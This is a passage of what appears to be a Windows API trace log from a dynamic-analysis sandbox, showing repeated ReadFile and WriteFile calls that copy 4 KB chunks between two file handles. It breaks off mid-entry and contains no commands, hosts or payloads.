[0067.204] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.204] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.204] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.204] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.205] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.205] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.205] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.205] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.205] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.206] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.206] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.206] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.207] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.207] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.208] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.208] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.208] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.209] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.209] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.209] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.209] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.209] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.210] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.210] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.210] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.210] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.210] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.210] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.211] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.211] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.211] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.211] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.212] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.212] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.212] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.212] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.212] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.212] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.213] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.213] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.213] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.213] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.213] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.214] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.215] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.215] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.215] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.215] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.216] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.216] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.216] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.216] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.216] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.217] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.217] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.217] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.217] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.217] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.218] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.218] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.219] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.219] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.219] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.219] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.219] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.219] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.220] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.220] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.220] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.220] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.220] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.221] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.221] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.221] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.221] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.221] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.223] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.223] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.223] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.223] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.223] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.224] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.224] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.224] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.224] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.224] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.225] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.225] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.225] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.225] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.234] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.234] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.235] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.235] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.235] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.235] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.236] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.236] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.236] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.236] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: 